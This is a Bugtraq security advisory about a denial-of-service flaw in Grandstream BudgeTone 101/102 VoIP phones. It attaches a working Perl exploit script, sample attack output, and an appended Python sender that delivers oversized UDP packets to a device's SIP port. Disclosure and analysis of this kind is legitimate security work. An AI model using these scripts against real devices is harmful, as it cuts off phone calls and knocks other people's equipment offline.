
List:       bugtraq
Subject:    Grandstream Budge Tone 101/102 DoS Vulnerability
From:       Kroma Pierre <kroma@syss.de>
Date:       2005-08-12 12:27:05
Message-ID: 20050812115852.9193.qmail@mail2.securityfocus.com



-------------------------------------------------------------------
SySS-Advisory: Grandstream Budge Tone 101/102 DoS Vulnerability
-------------------------------------------------------------------

Problem discovered:		July 20th 2005
Vendor contacted:		July 21st 2005
Advisory published on:		August 12th 2005

AUTHOR: 	Pierre Kroma (kroma@syss.de)
		SySS GmbH
		72070 Tuebingen / Germany
		Tel.: +49-7071-407856-0
Key fingerprint = 927A B13E 16F5 BBAB 8F17 75EB D8E1 A9A4 F257 4EEC

DEVICE:			Grandstream Budge Tone-101
			Grandstream Budge Tone-102
AFFECTED VERSIONS: 	firmware 1.0.6.7 (tested); earlier versions are possibly affected as well

EXPLOIT:		attached
VENDOR STATUS: 		informed
SEVERITY: 		medium
Remotely exploitable: 	yes

DESCRIPTION:
A remote denial of service can be triggered against this VoIP hardware
phone. Sending a UDP packet larger than 65534 bytes to the SIP port
(UDP 5060) stops the device:

- any active telephone call is aborted.
- the display goes blank / freezes.
- the integrated HTTP server is no longer reachable.

To recover, the phone has to be switched off and on again.

A packet of exactly 65534 bytes may reboot the device instead.
Smaller packets have no effect.

NOTE: the sizes above are the byte counts the attached script hands to
the socket. A single IPv4 UDP datagram carries at most 65507 bytes of
payload (65535 minus the 20-byte IP and 8-byte UDP headers), and at a
1500-byte MTU even that leaves the sender as 45 IP fragments which the
phone must reassemble before its SIP stack sees the datagram. When
reproducing the issue, capture the traffic on the wire rather than
relying on the byte counts alone.

############################################################################
EXAMPLE:
Grandstream BT101/BT102 DoS
written by pierre kroma (kroma@syss.de)

ping the remote device xxx.xxx.xxx.xxx
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data.
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=1 ttl=250 time=0.479 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=2 ttl=250 time=0.406 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3 ttl=250 time=0.404 ms

--- xxx.xxx.xxx.xxx ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2000ms
rtt min/avg/max/mdev = 0.404/0.429/0.479/0.042 ms

Wait ...

ping the remote device xxx.xxx.xxx.xxx again
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data.

--- xxx.xxx.xxx.xxx ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 1999ms
############################################################################

["grandstream-DoS.pl" (application/x-perl)]

#!/usr/bin/perl
#
# Grandstream BT101/BT102 DoS - sends one oversized UDP payload to the SIP port.
use strict;
use warnings;
use IO::Socket;
use Term::ANSIColor;

############################ U S A G E ###################################
system ("clear");
print "\nGrandstream BT101/BT102 DoS\n";
print "written by pierre kroma (kroma\@syss.de)\n\n";

if (!defined $ARGV[2]){
print qq~
Usage: perl grandstream-DoS.pl <ip-addr> <udp-port> {-r|-s}

	<ip-addr>  = ;-)
	<udp-port> = 5060

	-r = 'reboot' 	the Grandstream BT 101/102
	-s = 'shutdown' the Grandstream BT 101/102

~; exit;}
################################## D E F I N I T I O N S####################

my $victim = $ARGV[0];
my $port   = $ARGV[1];
(my $option = $ARGV[2]) =~ s/^-//;   # accept 'r' or '-r', 's' or '-s'
my $request;

# String comparison needs 'eq': with '==' both sides numify to 0, every
# branch matched and the 'shutdown' payload was sent regardless of option.
if ( lc($option) eq 'r' )
{	$request = 'k' x 65534;}   # exactly 65534 bytes: device may reboot
elsif ( lc($option) eq 's' )
{	$request = 'p' x 65535;}   # more than 65534 bytes: device freezes
else
{	print "Wrong parameter - try it again\n";
	exit;
}


# ping the remote device
print color 'bold blue';
print "\nping the remote device $victim\n";
print color 'reset';
system("ping", "-c", "3", $victim);   # list form: $victim is never passed to a shell

print color 'bold red';
print "\n Wait ... \n\n\n";
print color 'reset';
my $sox = IO::Socket::INET->new(Proto=>"udp",PeerPort=>"$port",PeerAddr=>"$victim")
	or die "cannot create UDP socket to $victim:$port: $@\n";

# NB: an IPv4 UDP datagram carries at most 65507 bytes of payload; a buffered
# print of 64 KB may reach the kernel as several smaller write() calls.
print $sox $request;
sleep 1;
close $sox;

# ping the remote device
print color 'bold blue';
print "ping the remote device $victim again\n";
print color 'reset';
system("ping", "-c", "3", $victim);
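The advisory's script writes its payload through a buffered Perl filehandle and never checks what size actually leaves the host. The following is an added example (editor's code, not SySS's or Grandstream's) that makes the wire-level picture explicit: the largest payload one IPv4 UDP datagram can carry, the IP fragments a datagram of a given size becomes at a 1500-byte MTU (all of which the phone must reassemble before port 5060 ever sees SIP data), and a sender that uses sendto() so that exactly one datagram is attempted and an oversize request fails visibly with EMSGSIZE. The module, its function names and the 1500-byte MTU default are assumptions of this example; the sizes 65534 and 65535 come from the advisory.

```python
#!/usr/bin/env python3
"""Size probe for the Grandstream BT101/BT102 oversized-UDP DoS (added example)."""
import errno
import socket
import sys

IPV4_HEADER_LEN = 20          # minimal IPv4 header, no options
UDP_HEADER_LEN = 8
IPV4_MAX_TOTAL_LEN = 65535    # 16-bit Total Length field
# Largest UDP payload that fits in one IPv4 datagram: 65507 bytes.
MAX_IPV4_UDP_PAYLOAD = IPV4_MAX_TOTAL_LEN - IPV4_HEADER_LEN - UDP_HEADER_LEN


def fits_single_datagram(payload_len: int) -> bool:
    """True if payload_len bytes can leave the host as ONE IPv4 UDP datagram."""
    return 0 <= payload_len <= MAX_IPV4_UDP_PAYLOAD


def fragment_plan(payload_len: int, mtu: int = 1500) -> list:
    """IP fragments a sender emits for one UDP datagram of payload_len bytes.

    Returns [(offset_bytes, data_len, more_fragments), ...] covering the
    UDP header plus payload. Every fragment but the last carries a multiple
    of 8 data bytes, as the 13-bit fragment offset field requires.
    """
    if not fits_single_datagram(payload_len):
        raise ValueError("payload exceeds 65507 bytes; cannot be one IPv4 datagram")
    transport_len = UDP_HEADER_LEN + payload_len
    per_frag = (mtu - IPV4_HEADER_LEN) // 8 * 8     # 1480 for MTU 1500
    plan = []
    offset = 0
    while offset < transport_len:
        data_len = min(per_frag, transport_len - offset)
        more = offset + data_len < transport_len
        plan.append((offset, data_len, more))
        offset += data_len
    return plan


def send_single_datagram(host: str, port: int, payload: bytes):
    """Send payload as exactly one datagram via sendto().

    Returns ("sent", n) or ("emsgsize", 0) when the kernel refuses the size.
    A buffered filehandle write would instead silently split the payload.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        try:
            return ("sent", s.sendto(payload, (host, port)))
        except OSError as exc:
            if exc.errno == errno.EMSGSIZE:
                return ("emsgsize", 0)
            raise


if __name__ == "__main__":
    # usage: python3 udp_size_probe.py <ip-addr> <udp-port> <payload-size>
    host, port, size = sys.argv[1], int(sys.argv[2]), int(sys.argv[3])
    print(f"max single-datagram payload: {MAX_IPV4_UDP_PAYLOAD}")
    if fits_single_datagram(size):
        frags = fragment_plan(size)
        print(f"{size} bytes -> {len(frags)} IP fragments at MTU 1500")
    else:
        print(f"{size} bytes cannot be one IPv4 datagram; sendto() will refuse it")
    print(send_single_datagram(host, port, b"k" * size))
```

Running it with the advisory's 65534 or 65535 reports that the size cannot be one datagram; with 65507 it reports 45 fragments, the last one carrying 395 bytes, which is the reassembly load the phone's IP stack has to absorb per request.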


